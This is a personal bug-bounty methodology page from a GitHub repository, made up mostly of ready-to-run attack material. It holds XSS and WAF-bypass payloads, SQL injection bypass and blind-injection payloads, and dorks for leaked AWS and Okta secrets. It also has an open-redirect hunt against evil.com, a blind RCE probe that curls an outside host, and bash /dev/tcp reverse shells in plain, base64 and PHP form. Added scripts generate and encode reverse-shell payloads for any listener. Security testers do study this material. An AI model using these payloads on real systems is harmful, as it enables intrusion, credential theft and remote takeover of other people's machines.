---
description: For Personal Reference
---

* Repository: https://github.com/xalgord/My-Methodologies (GitBook: https://methodological-notes.gitbook.io/methodology/)
* Description: Tools and methods that I personally use for Recon and Exploitations
* Topics: bug-bounty, bugbounty, penetration-testing, pentesting, recon, xss
* Default branch: main; last pushed 2025-02-26; 34 stars, 13 forks
# 🧑‍🏫 My Methodologies

{% embed url="https://github.com/xalgord" %}

#### Gathering Breached Credentials

* [https://github.com/hmaverickadams/breach-parse](https://github.com/hmaverickadams/breach-parse)

#### File upload vulnerability test

* [https://github.com/epinna/weevely3](https://github.com/epinna/weevely3)

### Common Ports for a web Application:

{% code overflow="wrap" %}
```
20, 21, 22, 23, 25, 53, 67, 68, 69, 80, 110, 123, 137, 138, 139, 143, 161, 162, 179, 194, 389, 443, 465, 514, 515, 587, 631, 636, 989, 990, 993, 995, 1080, 1433, 1521, 1723, 3306, 3389, 5432, 5900, 6379, 8000, 8080, 8443, 9000, 9200, 27017, 50000
```
{% endcode %}

**Set domain scope (Burp Suite)**

```
.*\.target\.com$
```

#### XSS recon methodology

▶ cat domains.txt | waybackurls > urls.txt

```
cat urls.txt | kxss | sed 's/=.*/=/' | sed 's/URL: //' | dalfox pipe -b xalgord.xss.ht
```

What each stage does:

```
cat urls.txt        --> read the file
| kxss              --> keep URLs whose parameters reflect special characters unfiltered
| sed 's/=.*/=/'    --> drop the parameter value, keep "param="
| sed 's/URL: //'   --> strip the "URL: " prefix that kxss prints
| dalfox pipe       --> feed the URLs to dalfox for XSS payload testing
-b xalgord.xss.ht   --> add a blind-XSS (BXSS) callback payload
```
#### KXSS

For a parameter to be a good XSS candidate, kxss should report these characters as unfiltered: **[ " ' < > $ | ( ) ` : ; { } ]**

**Payload:**

```
"><img%20src=x%20onerror="alert(%27POC%20By%20Xalgord%27)"
```

**Any-name tag XSS payload (the tag name does not matter; autofocus fires the onfocus handler):**

```
<x onfocus=alert(1) autofocus tabindex=1>
```

**WAF bypass payload (mixed case, URL-encoded slashes):**

```
<%2FScriPt><sCripT+class%3DXalgord>document.write(document.cookie);<%2FsCriPt>
```

#### Open Redirect Mass Hunt

* Tools: ragno, qsreplace

Collect URLs with ragno:

```
python3 ragno.py -d intensedebate.com -s -q -o ragno_urls.txt
```

Count, then keep, the URLs whose query string carries another URL (`=http`):

```
grep -a -i '=http' ragno_urls.txt | wc -l
```

```
grep -a -i '=http' ragno_urls.txt > potential_openredirect_vuln.txt
```

Replace every parameter value with the attacker host (qsreplace also de-duplicates the result):

```
cat potential_openredirect_vuln.txt | qsreplace "http://evil.com" | wc -l
```

```
cat potential_openredirect_vuln.txt | qsreplace "http://evil.com" > unique_potential_openredirect.txt
```

Request each candidate and flag the ones whose Location header points at evil.com:

```
cat unique_potential_openredirect.txt | while read -r target_url; do curl -s -L -I "$target_url" | grep -i '^location:.*evil\.com' && echo "[Vulnerable] $target_url"; done
```

Because qsreplace rewrites every parameter at once, a hit only tells you which URL redirected; re-test with a single parameter set to the payload to confirm which one is responsible before reporting.

* Example: one-liner for hunting mass open redirects

```
python3 ragno.py -d test.vulnweb.com -s -q -o ragno_urls.txt && grep -a -i '=http' ragno_urls.txt | qsreplace "http://evil.com" | while read -r target_url; do curl -s -L -I "$target_url" | grep -i '^location:.*evil\.com' && echo "[+] [Vulnerable] $target_url"; done
```
#### Amass Command

```
amass enum -brute -o output.txt -d example.com -v
```

#### Detect low-hanging bugs and sensitive information (API keys, secrets, etc.) in JS files and HTML pages

First run an Amass scan and save its output, then run Sublist3r in bruteforce mode and save its output to a different file. Merge the two lists and remove duplicate subdomains (the author uses https://www.textfixer.com/tools/remove-duplicate-lines.php; `sort -u` over both files does the same locally without uploading your scope to a third party).

Tool: https://github.com/BitTheByte/Eagle

Basic usage:

```
python3 main.py -f domains.txt
```

Advanced usage:

```
python3 main.py -f domains.txt -w 10 --db output.db.json
```

To check whether a Google Maps API key found this way is actually exploitable, use a tool such as gmapsapiscanner. It saves time by automating the checks against each Maps API and, for every API the key is allowed to call, generates the PoC request for you.

Tool: https://github.com/ozguralp/gmapsapiscanner

Usage:

```
python3 maps_api_scanner_python3.py
```

#### SQL Injection Methodologies

* Try logging in with admin / admin and send the login request to Burp.
* Run an active scan.
* If it reports SQL injection in a parameter, copy the request into a text file and hand it to sqlmap for the PoC:

```
sqlmap -r sql.txt --force-ssl --level 5 --risk 3 --dbs -p parameter
```

If sqlmap confirms it, you have a valid SQL injection 😎😎

**SQL Injection Auth Bypass:**

```
' || 1=1 # /2
```

#### Blind SQL Injection payload (time-based, MySQL):

```
email=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
```

#### Reflected XSS on a private program

1. Enumerate subdomains passively:

```
amass enum -passive -norecursive -noalts -d domain.com -o domain.txt
```

2. Keep the hosts that answer over HTTP(S):

```
cat domain.txt | httpx -o domainhttpx.txt
```

3. Run the nuclei templates against them:

```
cat domainhttpx.txt | nuclei -t /home/xalgord/nuclei-templates
```

DONE 😎

#### Find SQL injections (command combo)

```
subfinder -d target.com | tee -a domains
cat domains | httpx | tee -a urls.alive
cat urls.alive | waybackurls | tee -a urls.check
gf sqli urls.check >> urls.sqli
sqlmap -m urls.sqli --dbs --batch
```

Here's what's going on in detail:

1. First we find all subdomains under our target domain.
2. Next we identify all live web servers running on those subdomains.
3. waybackurls fetches every URL the Wayback Machine knows for those live subdomains.
4. gf filters the list down to URLs whose parameters match the sqli patterns.
5. Finally we run sqlmap on all identified potentially vulnerable URLs and let it do its magic.

Protip: If you need to bypass a WAF (Web Application Firewall) in the process, add the following options to sqlmap:

```
--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned
```
#### Get scope of Bugcrowd programs in CLI

bcscope fetches the scope of all bug bounty programs available on the Bugcrowd platform, including the private ones you are invited to.

All you have to do is provide your Bugcrowd session token:

```
bcscope -t <YOUR-TOKEN-HERE> -c 2 -p
```

![alt text](https://www.infosecmatter.com/wp-content/uploads/2020/10/list-scope-for-bugcrowd-bug-bounty-programs.jpg)

Quite convenient and pretty useful!

Get the tool here:

* https://github.com/sw33tLie/bcscope

#### Chaining file uploads with other vulns

When testing file upload functionality in a web application, try setting the filename to the following values; the filename often ends up in a filesystem path, a SQL statement, an HTML page or a shell command without sanitisation:

* `../../../tmp/lol.png` —> path traversal
* `sleep(10)-- -.jpg` —> SQL injection
* an XSS payload as the filename, with a .jpg/.png extension —> XSS
* `; sleep 10;` —> command injection

With these payloads we may trigger additional vulnerabilities.

#### GitHub dorks for AWS, Jira, Okta .. secrets

Here are some useful GitHub dorks shared by @hunter0x7 for identifying sensitive information related to Amazon AWS:

```
org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"
```

Here's another list of GitHub dorks shared by @GodfatherOrwa for identifying various other credentials and secrets:

```
"target.com" password or secret
"target.atlassian" password
"target.okta" password
"corp.target" password
"jira.target" password
"target.onelogin" password
target.service-now password
sometimes just "target"
```

Protip: While you are doing GitHub dorking, also try [GitDorker](https://github.com/obheda12/GitDorker) (made by [@obheda12](https://twitter.com/obheda12)), which automates the whole process and ships with 400+ dorks, for easy bug bounty wins.

Detailed information about GitDorker can be found [here](https://medium.com/@obheda12/gitdorker-a-new-tool-for-manual-github-dorking-and-easy-bug-bounty-wins-92a0a0a6b8d5).

Also check the related tip [BBT5-8](https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/#8_github_dorks_for_finding_secrets).
#### Simple reflected XSS scenario

Here's an interesting bug bounty write-up leading to a reflected XSS (Cross-Site Scripting triggered by visiting a link).

The author was able to identify and exploit the XSS even though the application was filtering some characters and keywords (possibly behind a WAF).

Here's what [@\_justYnot](https://twitter.com/_justYnot) did in detail:

1. Ran `subfinder -d target.com | httprobe -c 100 > target.txt`
2. Ran `cat target.txt | waybackurls | gf xss | kxss`
3. Got a URL where all the special characters were unfiltered; the parameter was `callback=`
4. Tried some basic XSS payloads, but they did not work: the site was filtering keywords in the payload (like `script` and `alert`)
5. Referred to the [@PortSwigger](https://twitter.com/PortSwigger) XSS cheat sheet ([link](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet))
6. After trying some payloads, one using the `onbegin` event worked and the XSS executed
7. Wrote a good report, sent it to the company and got rewarded $$

This is a perfect example of why we should never give up when things get difficult. When you've got a lead, keep pushing until you get the reward! Here's the list of tools [@\_justYnot](https://twitter.com/_justYnot) used:

* https://github.com/projectdiscovery/subfinder
* https://github.com/tomnomnom/httprobe
* https://github.com/tomnomnom/waybackurls
* https://github.com/tomnomnom/gf
* https://github.com/1ndianl33t/Gf-Patterns (xss pattern)
* https://github.com/tomnomnom/hacks/tree/master/kxss
#### XSS firewall bypass techniques

Here's a list of 8 useful techniques for bypassing a WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:

1. Check if the firewall blocks only lowercase:

```
<sCRipT>alert(1)</sCRiPt>
```

2. Try to break the firewall regex with a new line (\r\n), aka CRLF injection:

```
<script>%0d%0aalert(1)</script>
```

3. Try double encoding (here, a double-encoded `"`):

```
%2522
```

4. Test for non-recursive filters: if the firewall strips the inner `<script>` and `</script>` only once, what remains is a clean payload:

```
<scr<script>ipt>alert(1);</scr</script>ipt>
```

5. Inject an anchor tag without whitespace (`/` separates the tag name from the attribute; `&Tab;`, `&lpar;` and `&rpar;` are HTML entities the browser decodes inside the href):

```
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
```

6. Try to bypass whitespace filtering with a bullet character:

```
<svg•onload=alert(1)>
```

7. Try changing the request method (POST instead of GET), since some WAF rules only inspect the query string:

```
GET /?q=xss   -->   POST /   (q=xss in the body)
```

8. Try capitalizing the `alert` call and lowercasing it again at runtime:

```
</textarea><img src=x onerror="var pop='ALERT(document.cookie);'; eval(pop.toLowerCase());">
```
#### Short XSS Payload:

```
<script/src=//Ǌ.₨></script>
```

(The IDN characters keep the hostname short; substitute a host you control.)

#### Hex XSS Payloads (the hex literals are just unique markers so you can tell which injection fired):

```
</title><scRipt>alert(0x00C57D)</scRipt>
<iMg src%3dN onerror%3dalert(0x0036A9)>
<iMg src%3dN onerror%3dalert(0x000D98)>
```

### Throw this into EVERY parameter you see

```
'"`><img src=x>${{7*7}}
```

What each part of the polyglot tests:

```
'"`          =====> SQLi testing
'"`          ======> JS injection
'"`>         ======> HTML tag attribute injection
<img src=x>  =====> HTML injection
${{7*7}}     ======> CSTI
```

by @theXSSrat
#### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty

**Command**:

```
subfinder -d target.com -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml
assetfinder target.com | nuclei -t http/cves/2023/CVE-2023-24488.yaml
```

**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")

**Shodan Dork**:

```
ssl:target.com title:"Citrix gateway"
```

**Google Dork**:

```
intitle:"Citrix Gateway" -site:citrix.com
```

#### Some awesome people on twitter

* [@Dark\_Knight](https://twitter.com/_Dark_Knight_)
* [@El3ctr0Byt3s](https://twitter.com/El3ctr0Byt3s)
* [@sw33tLie](https://twitter.com/sw33tLie)
* [@sillydadddy](https://twitter.com/sillydadddy)
* [@manas\_hunter](https://twitter.com/manas_hunter)
* [@hunter0x7](https://twitter.com/hunter0x7)
* [@GodfatherOrwa](https://twitter.com/GodfatherOrwa)
* [@\_justYnot](https://twitter.com/_justYnot)
* [@0xAsm0d3us](https://twitter.com/0xAsm0d3us)
* [@sratarun](https://twitter.com/sratarun)
* [@cry\_\_pto](https://twitter.com/cry__pto)
* [@RathiArpeet](https://twitter.com/RathiArpeet)
* [@Alra3ees](https://twitter.com/Alra3ees)
* [@N008x](https://twitter.com/N008x)

#### Find all Subdomains in a Single Shot

Each source writes into one list, the merged list is de-duplicated, and only hosts that answer over HTTP(S) end up in the final file:

```
cat domains.txt | while read -r url; do
  { assetfinder --subs-only "$url"; crobat -s "$url"; subfinder -d "$url" -silent; } | sort -u | tee "$url.txt" | httprobe | sort -u > "final-$url.txt"
  echo -e "\e[1;33m[-] Working with $url\e[1;32m\n  -> done. File saved, please check :)\n"
done
```

#### VHOST Fuzzing using FFUF

```
ffuf -w ~/wordlists/subdomains.txt -H "Host: FUZZ.ffuf.me" -u http://ffuf.me
```

#### Directory Fuzzing using FFUF

```
ffuf -u $url/FUZZ -w ~/custom-list/custom.txt -mc all -fc 400,401,403,404,500 -ac -c -r -recursion
```

#### Feroxbuster directory fuzzing

```
feroxbuster -u $url -w /usr/share/wordlists/onelistforallshort.txt -C 404,403,429,400,401,405,302 -k
```

#### Check all methods on a domain list for information disclosure

```
cat domains.txt | httprobe | while read -r url; do
  ww=$(for m in GET PUT HEAD POST TRACE CONNECT OPTIONS; do curl -s -L -I -X "$m" "$url"; done | grep HTTP | grep -v '301 ' | awk '{ printf "%3d: %s\n", NR, $0 }')
  echo -e "\e[1;32m$url\e[0m\n$ww\n"
done
```

#### Path-based XSS with different methods

1. Inject the payload into every path and check for XSS.
2. Append fake parameters to every path and check for XSS.
3. The loop prints a PoC URL for each hit in your terminal.

```
cat domains.txt | gau | grep -Ev '(\.js|\.css|\.svg|\.jpeg|\.jpg)' | grep -v '=' | while read -r url; do
  dir=$(curl -s -L "$url/xss\"><" | grep -Eo '(xss"|xss\\")')
  dir2=$(curl -s -L "$url/?xss\"><" | grep -Eo '(xss"|xss\\")')
  echo -e "Target:\e[1;33m $url\e[0m\n \e[1;32m Method1 -> $dir\e[0m [POC: $url/test\"><]\n\e[1;32m  Method2 -> $dir2\e[0m [POC: $url/?test\"><]"
done | grep -E '(Target|xss)'
```
#### Find Blind RCE with automation

```
cat domains.txt | assetfinder --subs-only | httprobe | gau | grep -Ev '(\.js|\.png|\.svg|\.jpeg)' | grep '=' | qsreplace -a ' ||curl //burp-collaborator.burpcollaborator.net' | while read -r url; do curl -s "$url" > /dev/null; echo "[RCE-test] $url"; done
```

Replace the Collaborator hostname with your own payload domain. If you get a hit in Burp Collaborator, boom, RCE.

#### Scan open ports of a domain list using masscan

```
cat domains.txt | httpx -ip -silent | awk '{print $2}' | sed -e 's/\[//g' -e 's/\]//g' | tee ips.txt | while read -r ip; do mass=$(sudo masscan --ports 0-65535 "$ip"); echo -e "$ip \n $mass"; done
```

#### Easy way to find Path-based XSS

```
cat domains.txt | gau | grep -Ev '(=|\.png|\.svg|\.jpg|\.jpeg|\.gif|\.js|\.css)' | while read -r url; do dir=$(curl -s -L "$url/xss\"><" | grep 'xss"'); echo -e "Target:\e[1;33m $url/\"><\e[0m\n \e[1;32m$dir\e[0m"; done
```

#### Where to look for Blind XSS

1. Review forms
2. Contact-us pages
3. Password fields (you never know whether the other side handles the input properly and shows your password in clear somewhere)
4. Address fields of e-commerce sites
5. First or last name fields during credit card payments
6. The User-Agent header, set to a blind XSS payload (easy to do from a proxy such as Burp Suite)

There are many more cases; read published reports to see where other hackers are already applying these techniques and how you can use them in your program.

#### Find Google Maps API keys in JS files & endpoints from domains & subdomains

```
cat urls.txt | assetfinder | gau | grep -Ev '(\.png|\.svg|\.gif|\.jpg|\.jpeg|\.txt|\.ico|\.css|\?|\.pdf)' | while read -r url; do map=$(curl -s "$url" | grep -o 'AIza[0-9A-Za-z_-]\{35\}'); echo -e "$url -> $map"; done
```

#### Find a P1 bug in a minute

**Checking for SSTI:**

```
cat urls.txt | gau -subs | grep '=' | grep -Ev '(\.js|\.png|\.svg|\.gif|\.jpg|\.jpeg|\.txt|\.css|\.ico)' | qsreplace "ssti{{7*7}}" | while read -r url; do cur=$(curl -s "$url" | grep -o "ssti49"); echo -e "$url -> $cur"; done
```

Output: `https://example.com/?s=ssti{{7*7}} -> ssti49` means the template engine evaluated 7*7: vulnerable.
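The one-liner only reports `ssti49`; it says nothing about why a URL stayed quiet (probe not reflected, reflected literally, or braces stripped by a filter), and it cannot tell Jinja2 from Twig, which matters for the follow-up payload. The block below is an added example, not part of the original page: it generates the probe variants and classifies a response body for both the `ssti{{7*7}}` check above and the `${{7*7}}` polyglot earlier on this page. The names (`ssti_probe`, `ssti_verdict`, `engine_hint`, `ssti_check`, `sample_response`) are mine, and the sample responses are constructed, not captured.

```bash
#!/usr/bin/env bash
# Added example, not from the original page: classifies responses to the
# {{7*7}} probe. Function names are mine; sample responses are constructed.

MARKER=ssti   # same prefix as the page, so a hit reads "ssti49" and a stray "49" elsewhere is ignored

# ssti_probe KIND -> the raw (unencoded) value to put in the parameter
#   mul     {{7*7}}   49 in Jinja2, Twig, Nunjucks and similar
#   strmul  {{7*'7'}} Python engines repeat the string (7777777); Twig coerces to a number (49)
#   dollar  ${7*7}    49 in Freemarker, Mako, Java EL, Groovy
ssti_probe() {
  case $1 in
    mul)    printf '%s{{7*7}}\n' "$MARKER" ;;
    strmul) printf "%s{{7*'7'}}\n" "$MARKER" ;;
    dollar) printf '%s${7*7}\n' "$MARKER" ;;
  esac
}

# ssti_verdict   (response body on stdin, after sending the mul probe)
#   evaluated        the engine computed 7*7: "ssti49" came back (the page's grep)
#   literal          the probe came back unchanged: reflected but not evaluated
#   reflected-other  marker present but braces gone: a WAF or filter rewrote it
#   absent           the marker is not reflected at all
ssti_verdict() {
  local body
  body=$(cat)
  case $body in
    *"${MARKER}49"*)       echo evaluated ;;
    *"${MARKER}{{7*7}}"*)  echo literal ;;
    *"$MARKER"*)           echo reflected-other ;;
    *)                     echo absent ;;
  esac
}

# engine_hint   (response body on stdin, after sending the strmul probe)
# Only meaningful once ssti_verdict said "evaluated".
engine_hint() {
  local body
  body=$(cat)
  case $body in
    *"${MARKER}7777777"*) echo python-jinja2-like ;;   # string repetition
    *"${MARKER}49"*)      echo twig-like ;;            # numeric coercion
    *)                    echo unknown ;;
  esac
}

# ssti_check URL PARAM: live version (needs network, not run by the offline test).
# -G --data-urlencode sends the braces URL-encoded, so the probe survives
# intermediaries that reject raw { } in a request line.
ssti_check() {
  curl -s -G --max-time 10 --data-urlencode "$2=$(ssti_probe mul)" "$1" | ssti_verdict
}

# sample_response NAME: constructed responses for the offline test, not real traffic.
sample_response() {
  case $1 in
    jinja_mul)    printf '<h1>Results for %s49</h1>\n' "$MARKER" ;;
    jinja_strmul) printf '<h1>Results for %s7777777</h1>\n' "$MARKER" ;;
    twig_strmul)  printf '<h1>Results for %s49</h1>\n' "$MARKER" ;;
    literal)      printf '<h1>Results for %s{{7*7}}</h1>\n' "$MARKER" ;;
    stripped)     printf '<h1>Results for %s7*7</h1>\n' "$MARKER" ;;
    absent)       printf '<h1>No results</h1>\n' ;;
  esac
}

# Demo: verdict of the mul probe, then the engine hint from the strmul probe.
for name in jinja_mul literal stripped absent; do
  printf '%-10s %s\n' "$name" "$(sample_response "$name" | ssti_verdict)"
done
printf 'engine: %s / %s\n' "$(sample_response jinja_strmul | engine_hint)" "$(sample_response twig_strmul | engine_hint)"
```

Two caveats the one-liner hides: curl never runs client-side templates, so a client-side (AngularJS-style) evaluation of `{{7*7}}` only shows in a browser, and an `evaluated` verdict is a server-side template, not yet proof of code execution; confirm with an engine-specific payload before rating it P1.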
#### Check for SQLi in one shot across domains & subdomains

```
cat urls.txt | gau | grep -Ev '(\.js|\.png|\.svg|\.gif|\.jpg|\.jpeg|\.txt)' | gf sqli | urlive | tee sqli.txt && sqlmap -m sqli.txt --dbs --batch
```

#### Find xmlrpc.php in a single shot on domain & subdomains

```
cat domains.txt | assetfinder --subs-only | httprobe | while read -r url; do xml=$(curl -s -L "$url/xmlrpc.php" | grep 'XML-RPC'); echo -e "$url -> $xml"; done | grep 'XML-RPC' | sort -u
```

Output: `https://example.com -> XML-RPC server accepts POST requests only` (WordPress XML-RPC is enabled)

#### JSFScan.sh usage

```
bash JSFScan.sh -l targets.txt --all -r -o filename
```

#### XSS normal test input

```
"><u>Xalgord</u><marquee onstart='prompt(document.cookie)';>XSS</marquee>
```

***

### **Mobile App Testing Guide:**

* **Android:** [Intercept traffic with BurpSuite](https://www.youtube.com/watch?v=xp8ufidc514).
* **iOS:** [Proxy traffic using BurpSuite](https://www.youtube.com/watch?v=VVQtVeUxcdM).

### Find hidden GET parameters in JS files

Every `var name` declaration in a script becomes a candidate `?name=xss` parameter on the URL it was found in:

{% code overflow="wrap" %}
```bash
assetfinder example.com | gau | grep -Ev '(\.css|\.png|\.jpeg|\.jpg|\.svg|\.gif|\.woff)' | while read -r url; do
  vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9_]+" | sed -e "s|^var |$url?|" -e 's/$/=xss/')
  echo -e "\e[1;33m$url\n\e[1;32m$vars"
done
```
{% endcode %}
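The `grep -Eo "var [a-zA-Z0-9_]+"` above misses `let`/`const`, the second and later names in `var a = 1, b = 2;`, and declarations split across lines. The following is an added example, not part of the original page: a sturdier extractor that feeds the same `URL?name=xss` candidate list. The names (`js_identifiers`, `param_candidates`, `sample_js`) are mine; the sample script is constructed, not fetched from anywhere.

```bash
#!/usr/bin/env bash
# Added example, not from the original page. Function names are mine; the sample
# script is constructed.

# js_identifiers   (JavaScript source on stdin)
# Prints declared identifiers, one per line, sorted and de-duplicated.
# Handles var/let/const, comma-separated declarations and multi-line statements.
# Deliberately naive: "//" comments are cut to end of line (this also cuts a
# line after a "//" inside a string), and destructuring patterns are skipped.
js_identifiers() {
  sed 's#//.*$##' |                 # drop line comments
  tr '\r\n' '  ' |                  # join everything onto one line
  tr ';{}' '\n\n\n' |               # one statement (or block boundary) per line
  awk '
    { $0 = " " $0 }                 # a leading keyword still needs a boundary char in front
    /[^A-Za-z0-9_$](var|let|const)[[:space:]]/ {
      sub(/^.*[^A-Za-z0-9_$](var|let|const)[[:space:]]+/, "")   # keep what follows the keyword
      n = split($0, parts, ",")                                   # a = 1, b = f(2), c
      for (i = 1; i <= n; i++) {
        name = parts[i]
        sub(/^[[:space:]]+/, "", name)
        if (match(name, /^[A-Za-z_$][A-Za-z0-9_$]*/))
          print substr(name, RSTART, RLENGTH)
      }
    }' |
  sort -u
}

# param_candidates URL [MARKER]   (JavaScript source on stdin)
# Emits URL?name=MARKER (default marker "xss", as on the page) for every
# identifier, appending with & when URL already carries a query string.
param_candidates() {
  local url=$1 marker=${2:-xss} sep='?' name
  case $url in *\?*) sep='&' ;; esac
  js_identifiers | while IFS= read -r name; do
    printf '%s%s%s=%s\n' "$url" "$sep" "$name" "$marker"
  done
}

# sample_js: a constructed script, not a real file.
sample_js() {
  cat <<'EOF'
// app.js (constructed sample, not a real file)
var debug = false, adminPanel = "/admin", redirectUrl = location.search;
let callback = params.get('cb');
const apiKey=getKey(1,2), retries = 3;
function render(view) { var tmp = view; return tmp; }
EOF
}

# Demo: candidates for a page that the script above belongs to.
sample_js | param_candidates 'https://target.example/search'
```

Feed the output to the reflection check from the KXSS section rather than opening each URL by hand; a name that is reflected is a parameter the application reads, whatever the JavaScript does with it.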
### Get Reverse Shell:

Start a listener on the attacker machine first, then inject one of these into the command-injection point:

```bash
# run bash with stdin/stdout bound to a TCP socket back to the listener
;$(bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1');

# the payload itself
bash -i >& /dev/tcp/10.10.16.35/1234 0>&1

# base64-encoded payload, decoded and executed on the target (the > and & never appear in the injected text)
test;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzEyMzQgMD4mMQo= | base64 -d | bash;

# the same, unencoded, piped into bash
test;echo 'bash -i >& /dev/tcp/10.10.16.35/9001 0>&1' | bash;
```

### Depixelate images

```bash
pdfimages <pdf-file> <output-file>                                # extract the pixelated image from the PDF (written as .ppm)
python3 depix.py -p <pixelized-image>.ppm -s <reference-image>    # Depix: recover the text behind the pixelation using a reference image
```

### Reverse shell using ZIP file:

{% file src=".gitbook/assets/rce.zip" %}

The PHP file inside the archive:

```php
<?php echo system("echo 'bash -i >& /dev/tcp/10.10.16.35/9001 0>&1' | bash;") ?>
```
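The base64 variant above exists because `>`, `&` and the `/dev/tcp` path are exactly what input filters and quoting contexts tend to mangle. The block below is an added example, not part of the original page: it builds the plain and encoded payload for any listener, validates the port before anything is pasted into a target, and checks that the encoded form round-trips. The names (`revshell`, `revshell_b64`, `revshell_wrapped`, `is_b64_token`) are mine; 10.10.16.35:9001 is the page's example listener, not a live host.

```bash
#!/usr/bin/env bash
# Added example, not from the original page. Function names are mine; the
# listener address is the page's example, not a live host.

# revshell IP PORT -> the plain payload. Refuses a bad port so a typo does not
# end up inside a command you are about to run on someone else's box.
revshell() {
  local ip=$1 port=$2
  case $port in
    ''|*[!0-9]*) echo "revshell: port must be numeric" >&2; return 1 ;;
  esac
  [ "$port" -ge 1 ] && [ "$port" -le 65535 ] || { echo "revshell: port out of range" >&2; return 1; }
  printf 'bash -i >& /dev/tcp/%s/%s 0>&1\n' "$ip" "$port"
}

# revshell_b64 IP PORT -> the payload as one base64 token. GNU base64 wraps at
# 76 columns, which would split the token, hence the tr. The trailing newline
# of the plain command is encoded too, matching the token the page shows.
revshell_b64() {
  local plain
  plain=$(revshell "$1" "$2") || return 1
  printf '%s\n' "$plain" | base64 | tr -d '\n'
  echo
}

# revshell_wrapped IP PORT -> what goes into the injection point: a base64
# token plus the decoder, so the redirections are invisible to the target's
# input handling until bash decodes them.
revshell_wrapped() {
  local tok
  tok=$(revshell_b64 "$1" "$2") || return 1
  printf 'echo %s | base64 -d | bash\n' "$tok"
}

# is_b64_token STRING -> true when STRING contains only base64 alphabet characters
is_b64_token() {
  case $1 in
    ''|*[!A-Za-z0-9+/=]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Demo: plain, encoded and wrapped forms for the page's example listener.
revshell 10.10.16.35 9001
revshell_b64 10.10.16.35 9001
revshell_wrapped 10.10.16.35 9001
```

Decode a token before you fire it (`echo TOKEN | base64 -d`) and check that it names your own listener; the page's own encoded example points at 10.10.14.4:1234 while its plaintext examples use 10.10.16.35, which is the kind of mismatch this round-trip check catches.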
#### Opposite of Keyhacks -> notkeyhacks:

{% embed url="https://gitlab.com/dee-see/notkeyhacks" %}

![Screenshot\_2021-03-16-16-34-20-695\_com google android youtube](https://user-images.githubusercontent.com/48483027/111305580-284b7580-867d-11eb-8704-dee84bb789e9.jpg)

#### Increase XSS vulnerability impact

* [https://hacklido.com/blog/320-how-i-got-a-2000-bounty-with-rxss](https://hacklido.com/blog/320-how-i-got-a-2000-bounty-with-rxss)

#### Mindmaps for Penetration Testing

<figure><img src="https://user-images.githubusercontent.com/48483027/111863466-c68f5200-8981-11eb-9569-38fb5eacf8c9.png" alt=""><figcaption></figcaption></figure>

![assessment-mindset](https://user-images.githubusercontent.com/48483027/111871365-8ba41300-89af-11eb-944f-287a74f48a7f.png)